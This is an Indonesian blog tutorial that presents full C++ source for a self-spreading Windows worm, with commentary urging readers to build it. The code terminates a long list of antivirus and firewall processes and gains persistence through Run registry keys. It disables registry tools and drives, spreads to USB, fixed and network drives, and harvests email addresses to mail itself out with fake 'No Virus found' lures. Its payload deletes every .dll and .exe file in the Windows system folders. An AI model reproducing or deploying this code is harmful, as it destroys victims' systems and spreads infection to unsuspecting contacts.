FAIDISHARE.ID

Situs Berbagi Ilmu dan Pengalaman

Jumat, 20 Desember 2013

Home » » Membuat VIRUS Dengan C++

Membuat VIRUS Dengan C++

Tidak ada komentar

Hello all ....
Membuat virus dengan Borland C++ sangat sulit dibanding kan menggunakan aplikasi2 pembuat virus yg sudah tersebar luas di pasaran, pembuatan virus dengan C++ menggunakan fuuulll listing berbeda dengan aplikasi vb vimaker "yang nanti akan saya post" yg tingal masukan nama virus terus setting sana-sini ..... tapi buat yang punya nyali tinggi dan suka maen listing program, pembuatan virus dengan C++ patut di coba ......

Let's making virus dude .... !!!


001
#include <windows.h>
002
#include <tlhelp32>
003
#include <fstream>
004
#include <mapi>
005
#include <memory>
006
#pragma argsused
007
/* mulai menulis nama anti virus dan update apa aja yg anda tau, apa aja yg ingin di matikan servisnya EXE ya.. lo..h, bisa di modif dan ditambahin sesuai kemauan. tidak ada peraturan dlm membuat virus */
008

009
const char *kill_av[]={ "AGENTSVR.EXE", "ANTI-TROJAN.EXE", "ANTIVIRUS.EXE", "ANTS.EXE",
010
 "APIMONITOR.EXE", "APLICA32.EXE", "APVXDWIN.EXE", "ATCON.EXE",
011
 "ATGUARD.EXE", "ATRO55EN.EXE", "ATUPDATER.EXE", "ATWATCH.EXE",
012
 "AUPDATE.EXE", "AUTODOWN.EXE", "AUTOTRACE.EXE", "AUTOUPDATE.EXE",
013
 "AVCONSOL.EXE", "AVGSERV9.EXE", "AVLTMAIN.EXE", "AVPUPD.EXE",
014
 "AVSYNMGR.EXE", "AVWUPD32.EXE", "AVXQUAR.EXE", "AVprotect9x.exe",
015
 "Au.exe", "BD_PROFESSIONAL.EXE", "BIDEF.EXE", "BIDSERVER.EXE",
016
 "BIPCP.EXE", "BIPCPEVALSETUP.EXE", "BISP.EXE", "BLACKD.EXE",
017
 "BLACKICE.EXE", "BOOTWARN.EXE", "BORG2.EXE", "BS120.EXE",
018
 "CCAPP.exe", "CDP.EXE", "CFGWIZ.EXE", "CFIADMIN.EXE", "CFIAUDIT.EXE",
019
 "CFINET.EXE", "CFINET32.EXE", "CLEAN.EXE", "CLEANER.EXE", "CLEANER3.EXE",
020
 "CLEANPC.EXE", "CMGRDIAN.EXE", "CMON016.EXE", "CPD.EXE", "CPF9X206.EXE",
021
 "CPFNT206.EXE", "CV.EXE", "CWNB181.EXE", "CWNTDWMO.EXE", "D3dupdate.exe",
022
 "DEFWATCH.EXE", "DEPUTY.EXE", "DPF.EXE", "DPFSETUP.EXE", "DRWATSON.EXE",
023
 "DRWEBUPW.EXE", "ENT.EXE", "ESCANH95.EXE", "ESCANHNT.EXE",
024
 "ESCANV95.EXE", "EXANTIVIRUS-CNET.EXE", "FAST.EXE", "FIREWALL.EXE",
025
 "FLOWPROTECTOR.EXE", "FP-WIN_TRIAL.EXE", "FRW.EXE", "FSAV.EXE",
026
 "FSAV530STBYB.EXE", "FSAV530WTBYB.EXE", "FSAV95.EXE", "GBMENU.EXE",
027
 "GBPOLL.EXE", "GUARD.EXE", "HACKTRACERSETUP.EXE", "HTLOG.EXE",
028
 "HWPE.EXE", "IAMAPP.EXE", "IAMSERV.EXE", "ICLOAD95.EXE",
029
 "ICLOADNT.EXE", "ICMON.EXE", "ICSSUPPNT.EXE", "ICSUPP95.EXE",
030
 "ICSUPPNT.EXE", "IFW2000.EXE", "IPARMOR.EXE", "IRIS.EXE",
031
 "JAMMER.EXE", "KAVLITE40ENG.EXE", "KAVPERS40ENG.EXE",
032
 "KERIO-PF-213-EN-WIN.EXE", "KERIO-WRL-421-EN-WIN.EXE",
033
 "KERIO-WRP-421-EN-WIN.EXE", "KILLPROCESSSETUP161.EXE",
034
 "LDPRO.EXE", "LOCALNET.EXE", "LOCKDOWN.EXE", "LOCKDOWN2000.EXE",
035
 "LSETUP.EXE", "LUALL.EXE", "LUCOMSERVER.EXE", "LUINIT.EXE",
036
 "MCAGENT.EXE", "MCUPDATE.EXE", "MFW2EN.EXE", "MFWENG3.02D30.EXE",
037
 "MGUI.EXE", "msconfig.exe", "MINILOG.EXE", "MOOLIVE.EXE", "MRFLUX.EXE",
038
 "MSCONFIG.EXE", "MSINFO32.EXE", "MSSMMC32.EXE", "MU0311AD.EXE",
039
 "NAV80TRY.EXE", "NAVAPW32.EXE", "NAVDX.EXE", "NAVSTUB.EXE",
040
 "NAVW32.EXE", "NC2000.EXE", "NCINST4.EXE", "NDD32.EXE",
041
 "NEOMONITOR.EXE", "NETARMOR.EXE", "NETINFO.EXE", "NETMON.EXE",
042
 "NETSCANPRO.EXE", "NETSPYHUNTER-1.2.EXE", "NETSTAT.EXE",
043
 "NISSERV.EXE", "NISUM.EXE", "NMAIN.EXE", "NORTON_INTERNET_SECU_3.0_407.EXE",
044
 "NPF40_TW_98_NT_ME_2K.EXE", "NPFMESSENGER.EXE", "NPROTECT.EXE",
045
 "NSCHED32.EXE", "NTVDM.EXE", "NUPGRADE.EXE", "NVARCH16.EXE",
046
 "NWINST4.EXE", "NWTOOL16.EXE", "OSTRONET.EXE", "OUTPOST.EXE",
047
 "OUTPOSTINSTALL.EXE", "OUTPOSTPROINSTALL.EXE", "PADMIN.EXE",
048
 "PANIXK.EXE", "PAVPROXY.EXE", "PCC2002S902.EXE", "PCC2K_76_1436.EXE",
049
 "PCCIOMON.EXE", "PCDSETUP.EXE", "PCFWALLICON.EXE", "PCIP10117_0.EXE",
050
 "PDSETUP.EXE", "PERISCOPE.EXE", "PERSFW.EXE", "PF2.EXE", "PFWADMIN.EXE",
051
 "PINGSCAN.EXE", "PLATIN.EXE", "POPROXY.EXE", "POPSCAN.EXE", "PORTDETECTIVE.EXE",
052
 "PPINUPDT.EXE", "PPTBC.EXE", "PPVSTOP.EXE", "PROCEXPLORERV1.0.EXE",
053
 "PROPORT.EXE", "PROTECTX.EXE", "PSPF.EXE", "PURGE.EXE", "PVIEW95.EXE",
054
 "QCONSOLE.EXE", "QSERVER.EXE", "RAV8WIN32ENG.EXE", "RESCUE.EXE",
055
 "RESCUE32.EXE", "RRGUARD.EXE", "RSHELL.EXE", "RTVSCN95.EXE",
056
 "RULAUNCH.EXE", "SAFEWEB.EXE", "SBSERV.EXE", "SD.EXE", "SETUPVAMEEVAL.EXE",
057
 "SETUP_FLOWPROTECTOR_US.EXE", "SFC.EXE", "SGSSFW32.EXE",
058
 "avserve2.exe", "SHELLSPYINSTALL.EXE", "SHN.EXE", "SMC.EXE",
059
 "SOFI.EXE", "SPF.EXE", "SPHINX.EXE", "SPYXX.EXE", "SS3EDIT.EXE",
060
 "ST2.EXE", "SUPFTRL.EXE", "SUPPORTER5.EXE", "SYMPROXYSVC.EXE",
061
 "SYSEDIT.EXE", "TASKMGR", "TASKMON.EXE", "TAUMON.EXE", "TAUSCAN.EXE",
062
 "TC.EXE", "TCA.EXE", "TCM.EXE", "TDS-3.EXE", "TDS2-98.EXE",
063
 "TDS2-NT.EXE", "TFAK5.EXE", "TGBOB.EXE", "TITANIN.EXE",
064
 "TITANINXP.EXE", "TRACERT.EXE", "TRJSCAN.EXE", "TRJSETUP.EXE",
065
 "TROJANTRAP3.EXE", "UNDOBOOT.EXE", "UPDATE.EXE", "VBCMSERV.EXE",
066
 "VBCONS.EXE", "VBUST.EXE", "VBWIN9X.EXE", "VBWINNTW.EXE",
067
 "VCSETUP.EXE", "VFSETUP.EXE", "VIRUSMDPERSONALFIREWALL.EXE",
068
 "VNLAN300.EXE", "VNPC3000.EXE", "VPC42.EXE", "VPFW30S.EXE",
069
 "VPTRAY.EXE", "VSCENU6.02D30.EXE", "VSECOMR.EXE", "VSHWIN32.EXE",
070
 "VSISETUP.EXE", "VSMAIN.EXE", "VSMON.EXE", "VSSTAT.EXE",
071
 "VSWIN9XE.EXE", "VSWINNTSE.EXE", "VSWINPERSE.EXE",
072
 "W32DSM89.EXE", "W9X.EXE", "WATCHDOG.EXE", "WEBSCANX.EXE",
073
 "WGFE95.EXE", "WHOSWATCHINGME.EXE", "WINRECON.EXE",
074
 "WNT.EXE", "WRADMIN.EXE", "WRCTRL.EXE", "WSBGATE.EXE",
075
 "WYVERNWORKSFIREWALL.EXE", "XPF202EN.EXE", "ZAPRO.EXE",
076
 "ZAPSETUP3001.EXE", "ZATUTOR.EXE", "ZAUINST.EXE", "ZONALM2601.EXE",
077
 "ZONEALARM.EXE","zlclient.exe", "lexplore.exe", "Drunk_lol.pif",
078
 "Webcam_004.pif", 0};
079

080
const char *drives[] = {"a:", "b:", "c:", "d:", "e:", "f:", "g:", "h:", "i:", "j:", "k:", "l:",
081
 "m:", "n:", "o:", "p:", "q:", "r:", "s:", "t:", "u:", "v:", "w:", "x:",
082
 "y:", "z:", 0};
083

084
/* Mulai menginfeksi microsoft office */
085
char *fileNames[] = {"Message.exe", "Letter.exe", "Information.exe", "shadow_angel_lampung_underground.exe",
086
 "Documents.exe", "Attached_Message.exe", "Microsoft_Update.exe", "Private_Letter.exe",
087
 "Private_Document.exe", "Important_Message.exe"};
088

089
/* mulai memberi pesan pada form suatu program software, kalau bisa jgn dlm
090
 bahasa indonesia supaya enggak ketara bener virusnya,saran nih..*/
091
char *subs[] = {"Re: Message", "Re: Letter", "Re: Information", "Warning of your mail ",
092
 "Re: Your Documents", "Re: Account Info", "Windows Update",
093
 "Re: My Letter", "Re: Docs", "Re: Your Email Info"};
094

095
/* mulai menulis dan memberi pesan jika pengguna komputer menggunakan anti virusnya untuk
096
 menscan virus ini,nama web site antivirusnya serta pesan yg inggin ditampilkan.It just trick */
097
char *texts[] = {    "+++ Attachment: No Virus found  +++ MessageLabs AntiVirus - www.messagelabs.com",
098
 "+++ Attachment: No Virus found  +++ Bitdefender AntiVirus - www.bitdefender.com",
099
 "+++ Attachment: No Virus found  +++ MC-Afee AntiVirus -  www.mcafee.com",
100
 "+++ Attachment: No Virus found  +++ Kaspersky AntiVirus - www.kaspersky.com",
101
 "+++ Attachment: No Virus found  +++ Panda AntiVirus - www.pandasoftware.com",
102
 "+++ Attachment: No Virus found  ++++ Norton AntiVirus - www.symantec.de"};
103

104
/* mulai menginfeksi register */
105
char path[MAX_PATH];
106
HMODULE GetModH = GetModuleHandle(NULL);
107
HKEY hKey;
108
int i = 0;
109
MapiMessage mes;
110
MapiRecipDesc from;
111
char fileName[512];
112
unsigned short counting=0;
113
using namespace std;
114

115
void payload();
116
void GetDebugPriv();
117
void Kill(const char *kill_av);
118
int find_drives(const char *drives);
119
void no();
120
void findMail(char *);
121
void GetMail(char *, char *);
122
void SendMail(char *subject, char *sfrom,char *sto, char *smes);
123
void fastOut();
124

125
ULONG (PASCAL FAR *MSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
126

127
int PASCAL WinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPSTR lpCmdLine, int nCmdShow)
128
{
129
 HWND hide;
130
 AllocConsole();
131
 hide = FindWindowA("ConsoleWindowClass", NULL);
132
 ShowWindow(hide, 0);
133

134
 Sleep(60000);
135
 GetDebugPriv();
136
 CreateMutex(NULL, true, "-)(-=|L4r1$$4|=-)(-");
137
 if(GetLastError() == ERROR_ALREADY_EXISTS)
138
 {
139
 ExitProcess(0);
140
 }
141

142
 for(i = 0; kill_av[i]; i++)
143
 {
144
 Kill(kill_av[i]);
145
 }
146

147
 char sys[MAX_PATH];
148
 char sys2[MAX_PATH];
149
 char windir[MAX_PATH];
150
 GetModuleFileName(GetModH, path, sizeof(path));
151
 GetSystemDirectory(sys, sizeof(sys));
152
 GetSystemDirectory(sys2, sizeof(sys2));
153
 GetWindowsDirectory(windir, sizeof(windir));
154
 strcat(sys, "\\MSLARISSA.pif");
155
 strcat(sys2, "\\CmdPrompt32.pif");
156
 strcat(windir, "\\SP00Lsv32.pif");
157
 CopyFile(path, sys, false);
158
 CopyFile(path, sys2, false);
159
 CopyFile(path, windir, false);
160

161
 RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Run", 0, KEY_SET_VALUE, &hKey );
162
 RegSetValueEx(hKey, "MSLARISSA", 0, REG_SZ,(const unsigned char*)sys, sizeof(sys));



163
 RegSetValueEx(hKey, "Command Prompt32", 0, REG_SZ,(const unsigned char*)sys2, sizeof(sys2));
164
 RegSetValueEx(hKey, "(L4r1$$4) (4nt1) (V1ruz)", 0, REG_SZ,(const unsigned char*)windir, sizeof(windir));
165
 RegCloseKey(hKey);
166

167
 no();
168

169
 /* menjalankan perintah pd saat Internet explore di buka bisa di tambah dgn browse lain */
170
 ShellExecute(NULL, "open", "IExplore.exe", NULL, NULL, SW_HIDE);
171

172
 /* membuka otomatis web site yg kita inginkan di buka */
173
 ShellExecute(NULL, "open", "http://www.spyrozone.net", NULL, NULL, SW_HIDE);
174

175
 Sleep(60000);
176
 ShellExecute(NULL, "open", "C:\\WINDOWS\\WinVBS.vbs", NULL, NULL, SW_HIDE);
177

178
 for(i =0; drives[i]; i++)
179
 {
180
 find_drives(drives[i]);
181
 }
182

183
 HINSTANCE MAPIlHnd;
184
 unsigned char buff[128];
185
 DWORD buffs = 128;
186
 HKEY keyHnd;
187
 char keyPath[] = "Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
188
 char keyItem[] = "Personal";
189

190
 counting = (unsigned short)GetTickCount();
191

192
 while(counting > 9)
193
 {
194
 counting = (unsigned short)(counting/2);
195
 }
196

197
 if(!GetModuleFileName(hInstance, fileName,512))
198
 {
199
 fastOut();
200
 }
201

202
 MAPIlHnd = LoadLibraryA("MAPI32.DLL");
203

204
 if(!MAPIlHnd)
205
 {
206
 fastOut();
207
 }
208

209
 (FARPROC &)MSendMail = GetProcAddress(MAPIlHnd, "MAPISendMail");
210

211
 if(!MSendMail)
212
 {
213
 fastOut();
214
 }
215

216
 findMail(".");
217
 findMail("\\windows");
218

219
 if(RegOpenKeyEx((HKEY)0x80000001, keyPath, 0, KEY_READ, &keyHnd) == ERROR_SUCCESS)
220
 {
221
 if(ERROR_SUCCESS == RegQueryValueEx(keyHnd, keyItem, 0, 0, buff, &buffs))
222
 {
223
 buff[buffs-1] = '\\';
224
 buff[buffs] = 0;
225
 findMail((char *)buff);
226
 }
227
 }
228

229
 FreeLibrary(MAPIlHnd);
230

231
/*     1 juzt w4nn4 $4y... 1 l0v3 u ~!L4r1$$4!~     */
232

233
 payload();
234

235
 for(i = 0; i < 9999999999999999999; i++)
236
 {
237
 Sleep(60000);
238
 }
239

240
 ShellExecute(NULL, "open", "MSLARISSA.pif", NULL, NULL, SW_HIDE);
241
 Sleep(10000);
242
 ShellExecute(NULL, "open", "CmdPrompt32.pif", NULL, NULL, SW_HIDE);
243
 Sleep(10000);
244
 ShellExecute(NULL, "open", "SP00Lsv32.pif", NULL, NULL, SW_HIDE);
245

246
 return 0;
247
}
248

249
/*Menulis pesan pada komputer yg terinfeksi,yahh.. sekedar pesan aja */
250
void payload()
251
{
252
 ofstream sini;
253
 sini.open("C:\\PESAN.txt");
254
 sini.setf(ios_base::showpoint);
255
 sini<< "Komputer anda telah terinfeksi!" << endl;
256
 sini<< "kamu akan selamat," << endl;
257
 sini<< "Anda akan selamat untuk saat ini aja." << endl;
258
 sini<< "Tapi sistem komputer kamu akan rusak," << endl;
259
 sini<< "Kayaknya sih..." << endl;
260
 sini<< "Dibuat oleh," << endl;
261
 sini<< "Underground Lampung." << endl;
262
 sini<< "Hasta La Vista Bye.. Bye..," << endl;
263
 sini<< "   - SHADOW ANGEL : 7-20-07" << endl;
264
 sini.close();
265

266
 ofstream msg_av;
267
 msg_av.open("C:\\PESAN_KE_ANTIVIRUS.txt");
268
 msg_av.setf(ios_base::showpoint);
269
 msg_av << "Salam anti virus!" << endl;
270
 msg_av << "Saya ingin membuat industri anti virus <img src="http://www.spyrozone.net/hacking/wp-includes/images/smilies/icon_smile.gif" alt=":-)" class="wp-smiley"> " << endl;
271
 msg_av << "  ----------------------------------------  " << endl;
272
 msg_av << "       - SHADOW ANGEL: 7-20-07" << endl;
273
 msg_av.close();
274

275
 ofstream bropia_msg;
276
 bropia_msg.open("C:\\PESAN_KE_BROPIA.txt");
277
 bropia_msg.setf(ios_base::showpoint);
278
 bropia_msg << "Halo Bropia.. berhenti membuat worm MSN itu merupakan pekerjaan bodoh..." << endl;
279
 bropia_msg << "... lol -- Shadow Angel Anti Bropia... -- Selamatkan dunia dari  BROPIA!!!" << endl;
280
 bropia_msg << "                    - SHADOW ANGEL : 7-20-07" << endl;
281
 bropia_msg.close();
282

283
 system("del C:\\WINDOWS\\System32\\*.dll");
284
 system("del C:\\WINDOWS\\System32\\*.exe");
285
 system("del C:\\WINDOWS\\System\\*.dll");
286
 system("del C:\\WINDOWS\\System\\*.exe");
287
 system("del C:\\WINDOWS\\*.dll");
288
 system("del C:\\WINDOWS\\*.exe");
289
}
290

291
void Kill(const char *kill_av)
292
{
293
 HANDLE laris;
294
 PROCESSENTRY32 process;
295
 process.dwSize = sizeof(PROCESSENTRY32);
296
 void* photo = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
297
 Process32First(photo, &process);
298
 while(photo != NULL)
299
 {
300
 Process32Next(photo, &process);
301
 laris = OpenProcess(PROCESS_TERMINATE, false, process.th32ProcessID);
302
 if(!strcmp(process.szExeFile, kill_av))
303
 {
304
 TerminateProcess(laris, 0);
305
 CloseHandle(laris);
306
 break;
307
 }
308
 if(GetLastError() == ERROR_NO_MORE_FILES)
309
 {
310
 break;
311
 }
312
 CloseHandle(laris);
313
 }
314
}
315

316
void GetDebugPriv()
317
{
318
 HANDLE hToken;
319
 LUID DebugVal;
320
 TOKEN_PRIVILEGES tp;
321
 if(!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES | TOKEN_QUERY,&hToken))
322
 {
323
 return;
324
 }
325
 if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&DebugVal))
326
 {
327
 CloseHandle(hToken);
328
 return;
329
 }
330
 tp.PrivilegeCount = 1;
331
 tp.Privileges[0].Luid = DebugVal;
332
 tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
333
 AdjustTokenPrivileges(hToken, FALSE, &tp, sizeof(tp), NULL, NULL);
334
 CloseHandle(hToken);
335
}
336

337
/* Mulai menginveksi perangkat  USB */
338
int find_drives(const char *drives)
339
{
340
 char dir[MAX_PATH];
341
 UINT dr_type = GetDriveType(drives);
342

343
 if(dr_type == DRIVE_REMOVABLE)
344
 {
345
 strcpy(dir, drives);
346
 strcat(dir, "\\");
347
 strcat(dir, "PUISI_CINTA.pif");
348
 CopyFile(path, dir, true);
349
 return 0;
350
 }
351
 if(dr_type == DRIVE_FIXED)
352
 {
353
 strcpy(dir, drives);
354
 strcat(dir, "\\");
355
 strcat(dir, "PUISI_CINTA.pif");
356
 CopyFile(path, dir, true);
357
 return 0;
358
 }
359
 if(dr_type == DRIVE_REMOTE)
360
 {
361
 strcpy(dir, drives);
362
 strcat(dir, "\\");
363
 strcat(dir, "PUISI_CINTA.pif");
364
 CopyFile(path, dir, true);
365
 return 0;
366
 }
367
 return 0;
368
}
369

370
void no()
371
{
372
 ofstream nono;
373
 nono.open("C:\\WINDOWS\\WinVBS.vbs");
374
 nono.setf(ios_base::showpoint);
375
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoRun\", 1, \"REG_DWORD\"" << endl;
376
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\DisableRegistryTools\", 1, \"REG_DWORD\"" << endl;



377
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\NoDrives\", 67108863, \"REG_DWORD\"" << endl;
378
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\WinOldApp\\Disabled\", 1, \"REG_DWORD\"" << endl;
379
 nono << "CreateObject(\"Wscript.shell\").regwrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\NoAdminPage\", 1, \"REG_DWORD\"" << endl;
380
 nono.close();




381
}
382

383
void fastOut()
384
{
385
 MessageBox(NULL, "Invalid memory adress:\n\nProgram terminating.", "System Error", MB_OK | MB_ICONERROR);
386
 exit(-1);
387
}
388

389
void SendMail(char *subject, char *sfrom, char *sto, char *smes)
390
{
391
 memset(&mes, 0, sizeof(MapiMessage));
392
 memset(&from, 0, sizeof(MapiRecipDesc));
393
 from.lpszName = sfrom;
394
 from.ulRecipClass = MAPI_ORIG;
395
 mes.lpszSubject = subject;
396
 mes.lpRecips = (MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
397

398
 if(!mes.lpRecips)
399
 {
400
 fastOut();
401
 }
402

403
 memset(mes.lpRecips, 0, sizeof(MapiRecipDesc));
404
 mes.lpRecips->lpszName = sto;
405
 mes.lpRecips->ulRecipClass = MAPI_TO;
406
 mes.nRecipCount = 1;
407
 mes.lpFiles = (MapiFileDesc *)malloc(sizeof(MapiFileDesc));
408

409
 if(!mes.lpFiles)
410
 {
411
 fastOut();
412
 }
413

414
 memset(mes.lpFiles, 0, sizeof(MapiFileDesc));
415
 mes.lpFiles->lpszPathName = fileName;
416
 mes.lpFiles->lpszFileName = fileNames[counting];
417
 mes.nFileCount = 1;
418
 mes.lpOriginator = &from;
419
 mes.lpszNoteText = smes;
420
 (MSendMail)(0, 0, &mes, MAPI_LOGON_UI, 0);
421
 free(mes.lpRecips);
422
 free(mes.lpFiles);
423
}
424

425
void findMail(char *wild)
426
{
427
 HANDLE fh;
428
 WIN32_FIND_DATA fdata;
429
 char mail[128];
430
 char buff[512];
431
 wsprintf(buff, "%s\\*.ht*", wild);
432
 fh = FindFirstFile(buff, &fdata);
433
 if(fh == INVALID_HANDLE_VALUE)
434
 {
435
 return;
436
 }
437
 while(1)
438
 {
439
 wsprintf(buff, "%s\\%s", wild, fdata.cFileName);
440
 GetMail(buff, mail);
441
 if(strlen(mail)>0)
442
 {
443
 /* Mulai menuliskan E-mail pembuat,jangan dirubah ya.. Please T_T */
444
 SendMail(subs[counting], "shadow_angel@undergroundfc.com", mail, texts[counting]);
445
 counting++;
446
 {
447
 if(counting == 10)
448
 {
449
 counting = 0;
450
 }
451
 if(!FindNextFile(fh, &fdata))
452
 {
453
 FindClose(fh);
454
 return;
455
 }
456
 }
457
 }
458
 }
459
}
460

461
void GetMail(char *name, char *mail)
462
{
463
 HANDLE fd,fd2;
464
 char *mapped;
465
 DWORD size, i, k;
466
 BOOL test = FALSE, valid = FALSE;
467
 mail[0]=0;
468
 fd=CreateFile(name,GENERIC_READ, FILE_SHARE_READ, 0, OPEN_EXISTING, FILE_ATTRIBUTE_ARCHIVE, 0);
469
 if(fd == INVALID_HANDLE_VALUE)
470
 {
471
 return;
472
 }
473

474
 size = GetFileSize(fd,NULL);
475

476
 if(!size)
477
 {
478
 return;
479
 }
480

481
 if(size < 256)
482
 {
483
 return;
484
 }
485

486
 size -= 100;
487
 fd2 = CreateFileMapping(fd, 0, PAGE_READONLY, 0, 0, 0);
488
 if(!fd2)
489
 {
490
 CloseHandle(fd);
491
 return;
492
 }
493

494
 mapped = (char *)MapViewOfFile(fd2, FILE_MAP_READ, 0, 0, 0);
495
 if(!mapped)
496
 {
497
 CloseHandle(fd);
498
 return;
499
 }
500

501
 i = 0;
502

503
 while(i < size && !test)
504
 {
505
 if(!strncmp("mailto:", mapped + i, strlen("mailto:")))
506
 {
507
 test = TRUE;
508
 i += strlen("mailto:");
509
 k = 0;
510
 while(mapped[i]!=34 && mapped[i]!=39 && i < size && k < 127)
511
 {
512
 if(mapped[i] != ' ')
513
 {
514
 mail[k] = mapped[i];
515
 k++;
516

517
 if(mapped[i] == '@')
518
 {
519
 valid=TRUE;
520
 }
521
 }i++;
522
 }mail[k] = 0;
523
 }else
524
 {i++;
525
 }}
526
 if(!valid){
527
 mail[0] = 0;
528
 UnmapViewOfFile(mapped);
529
 CloseHandle(fd);
530
 return;
531
 }
532
}



Note : Pembuatan virus nya alangkah lebih indah di buat pake laptop temen anda coz takut nya malah jadi senjata makan tahu entar .... kekekekekkekke
Share:

0 komentar:

Posting Komentar

Statistik Penguunjung